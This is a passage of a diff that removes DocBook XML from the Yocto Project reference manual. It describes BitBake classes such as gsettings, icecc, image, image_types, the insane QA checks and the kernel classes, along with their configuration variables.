- <link linkend='var-LABELS'><filename>LABELS</filename></link>:
- A list of targets for the automatic configuration.
- </para></listitem>
- <listitem><para>
- <link linkend='var-APPEND'><filename>APPEND</filename></link>:
- An override list of append strings for each
- <filename>LABEL</filename>.
- </para></listitem>
- <listitem><para>
- <link linkend='var-GRUB_OPTS'><filename>GRUB_OPTS</filename></link>:
- Additional options to add to the configuration (optional).
- Options are delimited using semi-colon characters
- (<filename>;</filename>).</para></listitem>
- <listitem><para>
- <link linkend='var-GRUB_TIMEOUT'><filename>GRUB_TIMEOUT</filename></link>:
- Timeout before executing the default <filename>LABEL</filename>
- (optional).
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='ref-classes-gsettings'>
- <title><filename>gsettings.bbclass</filename></title>
-
- <para>
- The <filename>gsettings</filename> class
- provides common functionality for recipes that need to install
- GSettings (glib) schemas.
- The schemas are assumed to be part of the main package.
- Appropriate post-install and post-remove (postinst/postrm)
- scriptlets are added to register and unregister the schemas in the
- target image.
- </para>
-</section>
-
-<section id='ref-classes-gtk-doc'>
- <title><filename>gtk-doc.bbclass</filename></title>
-
- <para>
- The <filename>gtk-doc</filename> class
- is a helper class to pull in the appropriate
- <filename>gtk-doc</filename> dependencies and disable
- <filename>gtk-doc</filename>.
- </para>
-</section>
-
-<section id='ref-classes-gtk-icon-cache'>
- <title><filename>gtk-icon-cache.bbclass</filename></title>
-
- <para>
- The <filename>gtk-icon-cache</filename> class
- generates the proper post-install and post-remove (postinst/postrm)
- scriptlets for packages that use GTK+ and install icons.
- These scriptlets call <filename>gtk-update-icon-cache</filename> to add
- the fonts to GTK+'s icon cache.
- Since the cache files are architecture-specific,
- <filename>gtk-update-icon-cache</filename> is run using QEMU if the
- postinst scriptlets need to be run on the build host during image
- creation.
- </para>
-</section>
-
-<section id='ref-classes-gtk-immodules-cache'>
- <title><filename>gtk-immodules-cache.bbclass</filename></title>
-
- <para>
- The <filename>gtk-immodules-cache</filename> class
- generates the proper post-install and post-remove (postinst/postrm)
- scriptlets for packages that install GTK+ input method modules for
- virtual keyboards.
- These scriptlets call <filename>gtk-update-icon-cache</filename> to add
- the input method modules to the cache.
- Since the cache files are architecture-specific,
- <filename>gtk-update-icon-cache</filename> is run using QEMU if the
- postinst scriptlets need to be run on the build host during image
- creation.
- </para>
-
- <para>
- If the input method modules being installed are in packages other than
- the main package, set
- <link linkend='var-GTKIMMODULES_PACKAGES'><filename>GTKIMMODULES_PACKAGES</filename></link>
- to specify the packages containing the modules.
- </para>
-</section>
-
-<section id='ref-classes-gzipnative'>
- <title><filename>gzipnative.bbclass</filename></title>
-
- <para>
- The <filename>gzipnative</filename> class enables the use of
- different native versions of <filename>gzip</filename>
- and <filename>pigz</filename> rather than the versions of these tools
- from the build host.
- </para>
-</section>
-
-<section id='ref-classes-icecc'>
- <title><filename>icecc.bbclass</filename></title>
-
- <para>
- The <filename>icecc</filename> class supports
- <ulink url='https://github.com/icecc/icecream'>Icecream</ulink>, which
- facilitates taking compile jobs and distributing them among remote
- machines.
- </para>
-
- <para>
- The class stages directories with symlinks from <filename>gcc</filename>
- and <filename>g++</filename> to <filename>icecc</filename>, for both
- native and cross compilers.
- Depending on each configure or compile, the OpenEmbedded build system
- adds the directories at the head of the <filename>PATH</filename> list
- and then sets the <filename>ICECC_CXX</filename> and
- <filename>ICEC_CC</filename> variables, which are the paths to the
- <filename>g++</filename> and <filename>gcc</filename> compilers,
- respectively.
- </para>
-
- <para>
- For the cross compiler, the class creates a <filename>tar.gz</filename>
- file that contains the Yocto Project toolchain and sets
- <filename>ICECC_VERSION</filename>, which is the version of the
- cross-compiler used in the cross-development toolchain, accordingly.
- </para>
-
- <para>
- The class handles all three different compile stages
- (i.e native ,cross-kernel and target) and creates the necessary
- environment <filename>tar.gz</filename> file to be used by the remote
- machines.
- The class also supports SDK generation.
- </para>
-
- <para>
- If <link linkend='var-ICECC_PATH'><filename>ICECC_PATH</filename></link>
- is not set in your <filename>local.conf</filename> file, then the
- class tries to locate the <filename>icecc</filename> binary
- using <filename>which</filename>.
-
- If
- <link linkend='var-ICECC_ENV_EXEC'><filename>ICECC_ENV_EXEC</filename></link>
- is set in your <filename>local.conf</filename> file, the variable should
- point to the <filename>icecc-create-env</filename> script
- provided by the user.
- If you do not point to a user-provided script, the build system
- uses the default script provided by the recipe
- <filename>icecc-create-env-native.bb</filename>.
- <note>
- This script is a modified version and not the one that comes with
- <filename>icecc</filename>.
- </note>
- </para>
-
- <para>
- If you do not want the Icecream distributed compile support to apply
- to specific recipes or classes, you can effectively "blacklist" them
- by listing the recipes and classes using the
- <link linkend='var-ICECC_USER_PACKAGE_BL'><filename>ICECC_USER_PACKAGE_BL</filename></link>
- and
- <link linkend='var-ICECC_USER_CLASS_BL'><filename>ICECC_USER_CLASS_BL</filename></link>,
- variables, respectively, in your <filename>local.conf</filename> file.
- Doing so causes the OpenEmbedded build system to handle these
- compilations locally.
- </para>
-
- <para>
- Additionally, you can list recipes using the
- <link linkend='var-ICECC_USER_PACKAGE_WL'><filename>ICECC_USER_PACKAGE_WL</filename></link>
- variable in your <filename>local.conf</filename> file to force
- <filename>icecc</filename> to be enabled for recipes using an empty
- <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>
- variable.
- </para>
-
- <para>
- Inheriting the <filename>icecc</filename> class changes all sstate
- signatures.
- Consequently, if a development team has a dedicated build system
- that populates
- <link linkend='var-SSTATE_MIRRORS'><filename>STATE_MIRRORS</filename></link>
- and they want to reuse sstate from
- <filename>STATE_MIRRORS</filename>, then all developers and the
- build system need to either inherit the <filename>icecc</filename>
- class or nobody should.
- </para>
-
- <para>
- At the distribution level, you can inherit the
- <filename>icecc</filename> class to be sure that all builders start
- with the same sstate signatures.
- After inheriting the class, you can then disable the feature by setting
- the
- <link linkend='var-ICECC_DISABLED'><filename>ICECC_DISABLED</filename></link>
- variable to "1" as follows:
- <literallayout class='monospaced'>
- INHERIT_DISTRO_append = " icecc"
- ICECC_DISABLED ??= "1"
- </literallayout>
- This practice makes sure everyone is using the same signatures but also
- requires individuals that do want to use Icecream to enable the feature
- individually as follows in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- ICECC_DISABLED = ""
- </literallayout>
- </para>
-</section>
-
-<section id='ref-classes-image'>
- <title><filename>image.bbclass</filename></title>
-
- <para>
- The <filename>image</filename> class helps support creating images
- in different formats.
- First, the root filesystem is created from packages using
- one of the <filename>rootfs*.bbclass</filename>
- files (depending on the package format used) and then one or more image
- files are created.
- <itemizedlist>
- <listitem><para>The
- <filename><link linkend='var-IMAGE_FSTYPES'>IMAGE_FSTYPES</link></filename>
- variable controls the types of images to generate.
- </para></listitem>
- <listitem><para>The
- <filename><link linkend='var-IMAGE_INSTALL'>IMAGE_INSTALL</link></filename>
- variable controls the list of packages to install into the
- image.</para></listitem>
- </itemizedlist>
- For information on customizing images, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-extend-customimage'>Customizing Images</ulink>"
- section in the Yocto Project Development Tasks Manual.
- For information on how images are created, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>"
- section in the Yocto Project Overview and Concpets Manual.
- </para>
-</section>
-
-<section id='ref-classes-image-buildinfo'>
- <title><filename>image-buildinfo.bbclass</filename></title>
-
- <para>
- The <filename>image-buildinfo</filename> class writes information
- to the target filesystem on <filename>/etc/build</filename>.
- </para>
-</section>
-
-<section id='ref-classes-image_types'>
- <title><filename>image_types.bbclass</filename></title>
-
- <para>
- The <filename>image_types</filename> class defines all of the
- standard image output types that you can enable through the
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- variable.
- You can use this class as a reference on how to add support for
- custom image output types.
- </para>
-
- <para>
- By default, the
- <link linkend='ref-classes-image'><filename>image</filename></link>
- class automatically enables the <filename>image_types</filename> class.
- The <filename>image</filename> class uses the
- <filename>IMGCLASSES</filename> variable as follows:
- <literallayout class='monospaced'>
- IMGCLASSES = "rootfs_${IMAGE_PKGTYPE} image_types ${IMAGE_CLASSES}"
- IMGCLASSES += "${@['populate_sdk_base', 'populate_sdk_ext']['linux' in d.getVar("SDK_OS")]}"
- IMGCLASSES += "${@bb.utils.contains_any('IMAGE_FSTYPES', 'live iso hddimg', 'image-live', '', d)}"
- IMGCLASSES += "${@bb.utils.contains('IMAGE_FSTYPES', 'container', 'image-container', '', d)}"
- IMGCLASSES += "image_types_wic"
- IMGCLASSES += "rootfs-postcommands"
- IMGCLASSES += "image-postinst-intercepts"
- inherit ${IMGCLASSES}
- </literallayout>
- </para>
-
- <para>
- The <filename>image_types</filename> class also handles conversion and
- compression of images.
- <note>
- To build a VMware VMDK image, you need to add "wic.vmdk" to
- <filename>IMAGE_FSTYPES</filename>.
- This would also be similar for Virtual Box Virtual Disk Image
- ("vdi") and QEMU Copy On Write Version 2 ("qcow2") images.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-image-live'>
- <title><filename>image-live.bbclass</filename></title>
-
- <para>
- This class controls building "live" (i.e. HDDIMG and ISO) images.
- Live images contain syslinux for legacy booting, as well as the
- bootloader specified by
- <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
- if
- <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>
- contains "efi".
- </para>
-
- <para>
- Normally, you do not use this class directly.
- Instead, you add "live" to
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>.
- </para>
-</section>
-
-<section id='ref-classes-image-mklibs'>
- <title><filename>image-mklibs.bbclass</filename></title>
-
- <para>
- The <filename>image-mklibs</filename> class
- enables the use of the <filename>mklibs</filename> utility during the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- task, which optimizes the size of
- libraries contained in the image.
- </para>
-
- <para>
- By default, the class is enabled in the
- <filename>local.conf.template</filename> using the
- <link linkend='var-USER_CLASSES'><filename>USER_CLASSES</filename></link>
- variable as follows:
- <literallayout class='monospaced'>
- USER_CLASSES ?= "buildstats image-mklibs image-prelink"
- </literallayout>
- </para>
-</section>
-
-<section id='ref-classes-image-prelink'>
- <title><filename>image-prelink.bbclass</filename></title>
-
- <para>
- The <filename>image-prelink</filename> class
- enables the use of the <filename>prelink</filename> utility during
- the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- task, which optimizes the dynamic
- linking of shared libraries to reduce executable startup time.
- </para>
-
- <para>
- By default, the class is enabled in the
- <filename>local.conf.template</filename> using the
- <link linkend='var-USER_CLASSES'><filename>USER_CLASSES</filename></link>
- variable as follows:
- <literallayout class='monospaced'>
- USER_CLASSES ?= "buildstats image-mklibs image-prelink"
- </literallayout>
- </para>
-</section>
-
-<section id='ref-classes-insane'>
- <title><filename>insane.bbclass</filename></title>
-
- <para>
- The <filename>insane</filename> class adds a step to the package
- generation process so that output quality assurance checks are
- generated by the OpenEmbedded build system.
- A range of checks are performed that check the build's output
- for common problems that show up during runtime.
- Distribution policy usually dictates whether to include this class.
- </para>
-
- <para>
- You can configure the sanity checks so that specific test failures
- either raise a warning or an error message.
- Typically, failures for new tests generate a warning.
- Subsequent failures for the same test would then generate an error
- message once the metadata is in a known and good condition.
- See the
- "<link linkend='ref-qa-checks'>QA Error and Warning Messages</link>"
- Chapter for a list of all the warning and error messages
- you might encounter using a default configuration.
- </para>
-
- <para>
- Use the
- <link linkend='var-WARN_QA'><filename>WARN_QA</filename></link> and
- <link linkend='var-ERROR_QA'><filename>ERROR_QA</filename></link>
- variables to control the behavior of
- these checks at the global level (i.e. in your custom distro
- configuration).
- However, to skip one or more checks in recipes, you should use
- <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>.
- For example, to skip the check for symbolic link
- <filename>.so</filename> files in the main package of a recipe,
- add the following to the recipe.
- You need to realize that the package name override, in this example
- <filename>${PN}</filename>, must be used:
- <literallayout class='monospaced'>
- INSANE_SKIP_${PN} += "dev-so"
- </literallayout>
- Please keep in mind that the QA checks exist in order to detect real
- or potential problems in the packaged output.
- So exercise caution when disabling these checks.
- </para>
-
- <para>
- The following list shows the tests you can list with the
- <filename>WARN_QA</filename> and <filename>ERROR_QA</filename>
- variables:
- <itemizedlist>
- <listitem><para><emphasis><filename>already-stripped:</filename></emphasis>
- Checks that produced binaries have not already been
- stripped prior to the build system extracting debug symbols.
- It is common for upstream software projects to default to
- stripping debug symbols for output binaries.
- In order for debugging to work on the target using
- <filename>-dbg</filename> packages, this stripping must be
- disabled.
- </para></listitem>
- <listitem><para><emphasis><filename>arch:</filename></emphasis>
- Checks the Executable and Linkable Format (ELF) type, bit size,
- and endianness of any binaries to ensure they match the target
- architecture.
- This test fails if any binaries do not match the type since
- there would be an incompatibility.
- The test could indicate that the
- wrong compiler or compiler options have been used.
- Sometimes software, like bootloaders, might need to bypass
- this check.
- </para></listitem>
- <listitem><para><emphasis><filename>buildpaths:</filename></emphasis>
- Checks for paths to locations on the build host inside the
- output files.
- Currently, this test triggers too many false positives and
- thus is not normally enabled.
- </para></listitem>
- <listitem><para><emphasis><filename>build-deps:</filename></emphasis>
- Determines if a build-time dependency that is specified through
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>,
- explicit
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
- or task-level dependencies exists to match any runtime
- dependency.
- This determination is particularly useful to discover where
- runtime dependencies are detected and added during packaging.
- If no explicit dependency has been specified within the
- metadata, at the packaging stage it is too late to ensure that
- the dependency is built, and thus you can end up with an
- error when the package is installed into the image during the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- task because the auto-detected dependency was not satisfied.
- An example of this would be where the
- <link linkend='ref-classes-update-rc.d'><filename>update-rc.d</filename></link>
- class automatically adds a dependency on the
- <filename>initscripts-functions</filename> package to packages
- that install an initscript that refers to
- <filename>/etc/init.d/functions</filename>.
- The recipe should really have an explicit
- <filename>RDEPENDS</filename> for the package in question on
- <filename>initscripts-functions</filename> so that the
- OpenEmbedded build system is able to ensure that the
- <filename>initscripts</filename> recipe is actually built and
- thus the <filename>initscripts-functions</filename> package is
- made available.
- </para></listitem>
- <listitem><para><emphasis><filename>compile-host-path:</filename></emphasis>
- Checks the
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- log for indications
- that paths to locations on the build host were used.
- Using such paths might result in host contamination of the
- build output.
- </para></listitem>
- <listitem><para><emphasis><filename>debug-deps:</filename></emphasis>
- Checks that all packages except <filename>-dbg</filename>
- packages do not depend on <filename>-dbg</filename>
- packages, which would cause a packaging bug.
- </para></listitem>
- <listitem><para><emphasis><filename>debug-files:</filename></emphasis>
- Checks for <filename>.debug</filename> directories in anything but the
- <filename>-dbg</filename> package.
- The debug files should all be in the <filename>-dbg</filename> package.
- Thus, anything packaged elsewhere is incorrect packaging.</para></listitem>
- <listitem><para><emphasis><filename>dep-cmp:</filename></emphasis>
- Checks for invalid version comparison statements in runtime
- dependency relationships between packages (i.e. in
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
- <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
- <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
- <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
- and
- <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>
- variable values).
- Any invalid comparisons might trigger failures or undesirable
- behavior when passed to the package manager.
- </para></listitem>
- <listitem><para><emphasis><filename>desktop:</filename></emphasis>
- Runs the <filename>desktop-file-validate</filename> program
- against any <filename>.desktop</filename> files to validate
- their contents against the specification for
- <filename>.desktop</filename> files.</para></listitem>
- <listitem><para><emphasis><filename>dev-deps:</filename></emphasis>
- Checks that all packages except <filename>-dev</filename>
- or <filename>-staticdev</filename> packages do not depend on
- <filename>-dev</filename> packages, which would be a
- packaging bug.</para></listitem>
- <listitem><para><emphasis><filename>dev-so:</filename></emphasis>
- Checks that the <filename>.so</filename> symbolic links are in the
- <filename>-dev</filename> package and not in any of the other packages.
- In general, these symlinks are only useful for development purposes.
- Thus, the <filename>-dev</filename> package is the correct location for
- them.
- Some very rare cases do exist for dynamically loaded modules where
- these symlinks are needed instead in the main package.
- </para></listitem>
- <listitem><para><emphasis><filename>file-rdeps:</filename></emphasis>
- Checks that file-level dependencies identified by the
- OpenEmbedded build system at packaging time are satisfied.
- For example, a shell script might start with the line
- <filename>#!/bin/bash</filename>.
- This line would translate to a file dependency on
- <filename>/bin/bash</filename>.
- Of the three package managers that the OpenEmbedded build
- system supports, only RPM directly handles file-level
- dependencies, resolving them automatically to packages
- providing the files.
- However, the lack of that functionality in the other two
- package managers does not mean the dependencies do not still
- need resolving.
- This QA check attempts to ensure that explicitly declared
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- exist to handle any file-level dependency detected in
- packaged files.
- </para></listitem>
- <listitem><para><emphasis><filename>files-invalid:</filename></emphasis>
- Checks for
- <link linkend='var-FILES'><filename>FILES</filename></link>
- variable values that contain "//", which is invalid.
- </para></listitem>
- <listitem><para id='insane-host-user-contaminated'>
- <emphasis><filename>host-user-contaminated:</filename></emphasis>
- Checks that no package produced by the recipe contains any
- files outside of <filename>/home</filename> with a user or
- group ID that matches the user running BitBake.
- A match usually indicates that the files are being installed
- with an incorrect UID/GID, since target IDs are independent
- from host IDs.
- For additional information, see the section describing the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task.
- </para></listitem>
- <listitem><para><emphasis><filename>incompatible-license:</filename></emphasis>
- Report when packages are excluded from being created due to
- being marked with a license that is in
- <link linkend='var-INCOMPATIBLE_LICENSE'><filename>INCOMPATIBLE_LICENSE</filename></link>.
- </para></listitem>
- <listitem><para><emphasis><filename>install-host-path:</filename></emphasis>
- Checks the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- log for indications
- that paths to locations on the build host were used.
- Using such paths might result in host contamination of the
- build output.
- </para></listitem>
- <listitem><para><emphasis><filename>installed-vs-shipped:</filename></emphasis>
- Reports when files have been installed within
- <filename>do_install</filename> but have not been included in
- any package by way of the
- <link linkend='var-FILES'><filename>FILES</filename></link>
- variable.
- Files that do not appear in any package cannot be present in
- an image later on in the build process.
- Ideally, all installed files should be packaged or not
- installed at all.
- These files can be deleted at the end of
- <filename>do_install</filename> if the files are not
- needed in any package.
- </para></listitem>
- <listitem><para><emphasis><filename>invalid-chars:</filename></emphasis>
- Checks that the recipe metadata variables
- <link linkend='var-DESCRIPTION'><filename>DESCRIPTION</filename></link>,
- <link linkend='var-SUMMARY'><filename>SUMMARY</filename></link>,
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>,
- and
- <link linkend='var-SECTION'><filename>SECTION</filename></link>
- do not contain non-UTF-8 characters.
- Some package managers do not support such characters.
- </para></listitem>
- <listitem><para><emphasis><filename>invalid-packageconfig:</filename></emphasis>
- Checks that no undefined features are being added to
- <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>.
- For example, any name "foo" for which the following form
- does not exist:
- <literallayout class='monospaced'>
- PACKAGECONFIG[foo] = "..."
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis><filename>la:</filename></emphasis>
- Checks <filename>.la</filename> files for any <filename>TMPDIR</filename>
- paths.
- Any <filename>.la</filename> file containing these paths is incorrect since
- <filename>libtool</filename> adds the correct sysroot prefix when using the
- files automatically itself.</para></listitem>
- <listitem><para><emphasis><filename>ldflags:</filename></emphasis>
- Ensures that the binaries were linked with the
- <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
- options provided by the build system.
- If this test fails, check that the <filename>LDFLAGS</filename> variable
- is being passed to the linker command.</para></listitem>
- <listitem><para><emphasis><filename>libdir:</filename></emphasis>
- Checks for libraries being installed into incorrect
- (possibly hardcoded) installation paths.
- For example, this test will catch recipes that install
- <filename>/lib/bar.so</filename> when
- <filename>${base_libdir}</filename> is "lib32".
- Another example is when recipes install
- <filename>/usr/lib64/foo.so</filename> when
- <filename>${libdir}</filename> is "/usr/lib".
- </para></listitem>
- <listitem><para><emphasis><filename>libexec:</filename></emphasis>
- Checks if a package contains files in
- <filename>/usr/libexec</filename>.
- This check is not performed if the
- <filename>libexecdir</filename> variable has been set
- explicitly to <filename>/usr/libexec</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>packages-list:</filename></emphasis>
- Checks for the same package being listed multiple times through
- the <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- variable value.
- Installing the package in this manner can cause errors during
- packaging.
- </para></listitem>
- <listitem><para><emphasis><filename>perm-config:</filename></emphasis>
- Reports lines in <filename>fs-perms.txt</filename> that have
- an invalid format.
- </para></listitem>
- <listitem><para><emphasis><filename>perm-line:</filename></emphasis>
- Reports lines in <filename>fs-perms.txt</filename> that have
- an invalid format.
- </para></listitem>
- <listitem><para><emphasis><filename>perm-link:</filename></emphasis>
- Reports lines in <filename>fs-perms.txt</filename> that
- specify 'link' where the specified target already exists.
- </para></listitem>
- <listitem><para><emphasis><filename>perms:</filename></emphasis>
- Currently, this check is unused but reserved.
- </para></listitem>
- <listitem><para><emphasis><filename>pkgconfig:</filename></emphasis>
- Checks <filename>.pc</filename> files for any
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>/<link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
- paths.
- Any <filename>.pc</filename> file containing these paths is incorrect
- since <filename>pkg-config</filename> itself adds the correct sysroot prefix
- when the files are accessed.</para></listitem>
- <listitem><para><emphasis><filename>pkgname:</filename></emphasis>
- Checks that all packages in
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- have names that do not contain invalid characters (i.e.
- characters other than 0-9, a-z, ., +, and -).
- </para></listitem>
- <listitem><para><emphasis><filename>pkgv-undefined:</filename></emphasis>
- Checks to see if the <filename>PKGV</filename> variable
- is undefined during
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>.
- </para></listitem>
- <listitem><para><emphasis><filename>pkgvarcheck:</filename></emphasis>
- Checks through the variables
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
- <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
- <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>,
- <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
- <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
- <link linkend='var-FILES'><filename>FILES</filename></link>,
- <link linkend='var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></link>,
- <filename>pkg_preinst</filename>,
- <filename>pkg_postinst</filename>,
- <filename>pkg_prerm</filename>
- and <filename>pkg_postrm</filename>, and reports if there are
- variable sets that are not package-specific.
- Using these variables without a package suffix is bad practice,
- and might unnecessarily complicate dependencies of other packages
- within the same recipe or have other unintended consequences.
- </para></listitem>
- <listitem><para><emphasis><filename>pn-overrides:</filename></emphasis>
- Checks that a recipe does not have a name
- (<link linkend='var-PN'><filename>PN</filename></link>) value
- that appears in
- <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
- If a recipe is named such that its <filename>PN</filename>
- value matches something already in
- <filename>OVERRIDES</filename> (e.g. <filename>PN</filename>
- happens to be the same as
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- or
- <link linkend='var-DISTRO'><filename>DISTRO</filename></link>),
- it can have unexpected consequences.
- For example, assignments such as
- <filename>FILES_${PN} = "xyz"</filename> effectively turn into
- <filename>FILES = "xyz"</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>rpaths:</filename></emphasis>
- Checks for rpaths in the binaries that contain build system paths such
- as <filename>TMPDIR</filename>.
- If this test fails, bad <filename>-rpath</filename> options are being
- passed to the linker commands and your binaries have potential security
- issues.</para></listitem>
- <listitem><para><emphasis><filename>split-strip:</filename></emphasis>
- Reports that splitting or stripping debug symbols from binaries
- has failed.
- </para></listitem>
- <listitem><para><emphasis><filename>staticdev:</filename></emphasis>
- Checks for static library files (<filename>*.a</filename>) in
- non-<filename>staticdev</filename> packages.
- </para></listitem>
- <listitem><para><emphasis><filename>symlink-to-sysroot:</filename></emphasis>
- Checks for symlinks in packages that point into
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- on the host.
- Such symlinks will work on the host, but are clearly invalid
- when running on the target.
- </para></listitem>
- <listitem><para><emphasis><filename>textrel:</filename></emphasis>
- Checks for ELF binaries that contain relocations in their
- <filename>.text</filename> sections, which can result in a
- performance impact at runtime.
- See the explanation for the
- <link linkend='qa-issue-textrel'><filename>ELF binary</filename></link>
- message for more information regarding runtime performance issues.
- </para></listitem>
-<!--
-This check was removed for YP 2.3 release
-
- <listitem><para><emphasis><filename>unsafe-references-in-binaries:</filename></emphasis>
- Reports when a binary installed in
- <filename>${base_libdir}</filename>,
- <filename>${base_bindir}</filename>, or
- <filename>${base_sbindir}</filename>, depends on another
- binary installed under <filename>${exec_prefix}</filename>.
- This dependency is a concern if you want the system to remain
- basically operable if <filename>/usr</filename> is mounted
- separately and is not mounted.
- <note>
- Defaults for binaries installed in
- <filename>${base_libdir}</filename>,
- <filename>${base_bindir}</filename>, and
- <filename>${base_sbindir}</filename> are
- <filename>/lib</filename>, <filename>/bin</filename>, and
- <filename>/sbin</filename>, respectively.
- The default for a binary installed
- under <filename>${exec_prefix}</filename> is
- <filename>/usr</filename>.
- </note>
- </para></listitem>
--->
- <listitem><para><emphasis><filename>useless-rpaths:</filename></emphasis>
- Checks for dynamic library load paths (rpaths) in the binaries that
- by default on a standard system are searched by the linker (e.g.
- <filename>/lib</filename> and <filename>/usr/lib</filename>).
- While these paths will not cause any breakage, they do waste space and
- are unnecessary.</para></listitem>
- <listitem><para><emphasis><filename>var-undefined:</filename></emphasis>
- Reports when variables fundamental to packaging (i.e.
- <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>,
- <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>,
- <link linkend='var-D'><filename>D</filename></link>,
- <link linkend='var-PN'><filename>PN</filename></link>, and
- <link linkend='var-PKGD'><filename>PKGD</filename></link>) are
- undefined during
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>.
- </para></listitem>
- <listitem><para><emphasis><filename>version-going-backwards:</filename></emphasis>
- If Build History is enabled, reports when a package
- being written out has a lower version than the previously
- written package under the same name.
- If you are placing output packages into a feed and
- upgrading packages on a target system using that feed, the
- version of a package going backwards can result in the target
- system not correctly upgrading to the "new" version of the
- package.
- <note>
- If you are not using runtime package management on your
- target system, then you do not need to worry about
- this situation.
- </note>
- </para></listitem>
- <listitem><para><emphasis><filename>xorg-driver-abi:</filename></emphasis>
- Checks that all packages containing Xorg drivers have ABI
- dependencies.
- The <filename>xserver-xorg</filename> recipe provides driver
- ABI names.
- All drivers should depend on the ABI versions that they have
- been built against.
- Driver recipes that include
- <filename>xorg-driver-input.inc</filename>
- or <filename>xorg-driver-video.inc</filename> will
- automatically get these versions.
- Consequently, you should only need to explicitly add
- dependencies to binary driver recipes.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='ref-classes-insserv'>
- <title><filename>insserv.bbclass</filename></title>
-
- <para>
- The <filename>insserv</filename> class
- uses the <filename>insserv</filename> utility to update the order of
- symbolic links in <filename>/etc/rc?.d/</filename> within an image
- based on dependencies specified by LSB headers in the
- <filename>init.d</filename> scripts themselves.
- </para>
-</section>
-
-<section id='ref-classes-kernel'>
- <title><filename>kernel.bbclass</filename></title>
-
- <para>
- The <filename>kernel</filename> class handles building Linux kernels.
- The class contains code to build all kernel trees.
- All needed headers are staged into the
- <filename><link linkend='var-STAGING_KERNEL_DIR'>STAGING_KERNEL_DIR</link></filename>
- directory to allow out-of-tree module builds using
- the
- <link linkend='ref-classes-module'><filename>module</filename></link>
- class.
- </para>
-
- <para>
- This means that each built kernel module is packaged separately and
- inter-module dependencies are created by parsing the
- <filename>modinfo</filename> output.
- If all modules are required, then installing the
- <filename>kernel-modules</filename> package installs all packages with
- modules and various other kernel packages such as
- <filename>kernel-vmlinux</filename>.
- </para>
-
- <para>
- The <filename>kernel</filename> class contains logic that allows
- you to embed an initial RAM filesystem (initramfs) image when
- you build the kernel image.
- For information on how to build an initramfs, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- Various other classes are used by the <filename>kernel</filename>
- and <filename>module</filename> classes internally including the
- <link linkend='ref-classes-kernel-arch'><filename>kernel-arch</filename></link>,
- <link linkend='ref-classes-module-base'><filename>module-base</filename></link>,
- and
- <link linkend='ref-classes-linux-kernel-base'><filename>linux-kernel-base</filename></link>
- classes.
- </para>
-</section>
-
-<section id='ref-classes-kernel-arch'>
- <title><filename>kernel-arch.bbclass</filename></title>
-
- <para>
- The <filename>kernel-arch</filename> class
- sets the <filename>ARCH</filename> environment variable for Linux
- kernel compilation (including modules).
- </para>
-</section>
-
-<section id='ref-classes-kernel-devicetree'>
- <title><filename>kernel-devicetree.bbclass</filename></title>
-
- <para>
- The <filename>kernel-devicetree</filename> class, which is inherited by
- the
- <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
- class, supports device tree generation.
- </para>
-</section>
-
-<section id='ref-classes-kernel-fitimage'>
- <title><filename>kernel-fitimage.bbclass</filename></title>
-
- <para>
- The <filename>kernel-fitimage</filename> class provides support to
- pack zImages.
- </para>
-</section>
-
